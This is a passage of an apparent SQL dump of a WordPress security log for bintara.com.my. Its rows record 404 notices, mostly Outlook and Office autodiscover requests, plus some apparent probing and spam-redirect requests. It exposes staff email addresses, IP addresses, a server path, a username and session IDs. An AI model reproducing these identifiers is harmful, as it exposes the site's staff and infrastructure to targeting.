Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"D260332B-C04E-44AB-97A1-0823C1B40DE2\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa5jiuAgYuZ1@aLzbZgb4gAAAJA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.245\";s:11:\"REMOTE_PORT\";s:5:\"49834\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa5jiuAgYuZ1@aLzbZgb4gAAAJA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571709834.2172\";s:12:\"REQUEST_TIME\";s:10:\"1571709834\";}}','notice','2019-10-22 02:03:57','2019-10-22 02:03:54',35666536,37465352,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.245'),(28690,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"D303D68D-9F96-40A1-BF82-7E5E413DD80F\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa5kHPKpfhdzjfAsCG03vgAAAQc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.245\";s:11:\"REMOTE_PORT\";s:5:\"51227\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa5kHPKpfhdzjfAsCG03vgAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571709980.7203\";s:12:\"REQUEST_TIME\";s:10:\"1571709980\";}}','notice','2019-10-22 02:06:23','2019-10-22 02:06:21',35269776,37076192,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.245'),(28691,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"356\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{19A5EC26-C304-4FFB-8ECE-C0AB94C63C7B}\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:57:\"OutlookSession=\\\"{9D8AFA07-A8E7-4D99-968C-BC3EF60E4682}\\\"\";s:10:\"HTTP_DEPTH\";s:1:\"0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:74:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.11929; Pro)\";s:20:\"HTTP_X_ANCHORMAILBOX\";s:23:\"iskandar@bintara.com.my\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_MAPIHTTPCAPABILITY\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:19:\"HTTP_X_MS_NEGOTIATE\";s:6:\"Server\";s:20:\"HTTP_X_USER_IDENTITY\";s:19:\"faiz@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa5o4p-09PeaulOT6TbtgAAAAME\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.245\";s:11:\"REMOTE_PORT\";s:5:\"51128\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa5o4p-09PeaulOT6TbtgAAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571711202.8748\";s:12:\"REQUEST_TIME\";s:10:\"1571711202\";}}','notice','2019-10-22 02:26:46','2019-10-22 02:26:43',35692024,37492088,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.245'),(28692,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:111:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:110:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/08C09F\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:109:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"45.114.74.77\";s:11:\"REMOTE_PORT\";s:5:\"58485\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa597@AgYuZ1@aLzbZgjJAAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571716591.5599\";s:12:\"REQUEST_TIME\";s:10:\"1571716591\";}}','notice','2019-10-22 03:56:35','2019-10-22 03:56:31',35315784,37121632,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Ftryonlinedatingsites.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'45.114.74.77'),(28693,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:38:\"/1/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:25:\"https://bintara.com.my/1/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:3:\"/1/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa6HSknklFpw1fCLzD@ffwAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:25:\"https://bintara.com.my/1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:3:\"/1/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa6HSknklFpw1fCLzD@ffwAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.39.111\";s:11:\"REMOTE_PORT\";s:5:\"46512\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:25:\"https://bintara.com.my/1/\";s:10:\"SCRIPT_URL\";s:3:\"/1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa6HSknklFpw1fCLzD@ffwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571718987.047\";s:12:\"REQUEST_TIME\";s:10:\"1571718987\";}}','notice','2019-10-22 04:36:29','2019-10-22 04:36:27',34970520,36766168,'https://bintara.com.my/1/?initiationactivity=initiationready',1,0,'166.62.39.111'),(28694,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/1/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:25:\"https://bintara.com.my/1/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:3:\"/1/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa6HifKpfhdzjfAsCG1MPgAAAQs\";s:19:\"REDIRECT_SCRIPT_URI\";s:25:\"https://bintara.com.my/1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:3:\"/1/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa6HifKpfhdzjfAsCG1MPgAAAQs\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.39.111\";s:11:\"REMOTE_PORT\";s:5:\"36706\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:25:\"https://bintara.com.my/1/\";s:10:\"SCRIPT_URL\";s:3:\"/1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa6HifKpfhdzjfAsCG1MPgAAAQs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571719049.7976\";s:12:\"REQUEST_TIME\";s:10:\"1571719049\";}}','notice','2019-10-22 04:37:32','2019-10-22 04:37:30',34967880,36769872,'https://bintara.com.my/1/?key=testActivation',1,0,'166.62.39.111'),(28695,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"01F57A29-F6FD-42FF-B7FB-6FA0926E5019\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa6M3UnklFpw1fCLzD@kkAAAAA4\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.245\";s:11:\"REMOTE_PORT\";s:5:\"55873\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa6M3UnklFpw1fCLzD@kkAAAAA4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571720413.9711\";s:12:\"REQUEST_TIME\";s:10:\"1571720413\";}}','notice','2019-10-22 05:00:15','2019-10-22 05:00:14',35275720,37080472,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.245'),(28696,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"6D49E851-E4C4-403E-ADB0-DBAFF01BE4D1\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa6YwUnklFpw1fCLzD@suwAAABc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.245\";s:11:\"REMOTE_PORT\";s:5:\"54286\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa6YwUnklFpw1fCLzD@suwAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571723457.6194\";s:12:\"REQUEST_TIME\";s:10:\"1571723457\";}}','notice','2019-10-22 05:51:00','2019-10-22 05:50:57',35662232,37461824,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.245'),(28697,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/hp-designjet-printers/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, 